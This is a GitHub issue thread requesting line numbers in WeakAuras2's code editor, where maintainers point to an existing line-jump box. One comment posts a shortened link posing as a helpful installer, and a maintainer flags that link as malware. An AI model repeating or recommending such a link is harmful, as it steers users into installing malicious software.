### ISSUE TITLE
Add a checkbox option in expanded code edit windows to show line numbers

### ISSUE THREAD

**Issue by calummitchell** [WeakAuras/WeakAuras2#5377]
**Is your feature request related to a problem? Please describe.**
Syntax errors in weakauras custom code and lua errors in Bugsack tell you which line number to look at. For small blocks of code you can simply count the lines or use the line number in the top right next to the Snippets button. However, for large blocks of code I usually copy and paste the code into an editor and either jump to the specific line number or use the line numbers along on the left side of the window as I page down. 

**Describe the solution you'd like**
Have a checkbox option to toggle the display of line numbers along the left hand side of the edit window.

**Describe alternatives you've considered**

**Additional context**
![linenumbers](https://github.com/user-attachments/assets/f1209bfe-0e4e-4528-8502-b8b816fcdd90)

**Comment by 777Naity** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by mrbuds** [comment]
@calummitchell do not install the linked file in previous comment, it's a malware

**Comment by mrbuds** [comment]
> For small blocks of code you can simply count the lines or use the line number in the top right next to the Snippets button

you can type the line number in that box next to snippets button

https://github.com/user-attachments/assets/fb05f55d-fa8d-44b8-ba1f-55b0101871e4

**Comment by calummitchell** [comment]
That solves my problem, thanks. I don't know whether it's worth considering adding lines numbers also. I've personally had them turned on in the editors I use for years and like having them even though ctrl-g lets me jump to a specific line. I also don't know how many people are aware you can type in a line number next to Snippets. I never thought to try it even though in hindsight it's obviously an edit box.

Feel free to close this out if none of the developers like the idea.

**Comment by InfusOnWoW** [comment]
That's would be a huge effort due to how little control we have over the editbox.
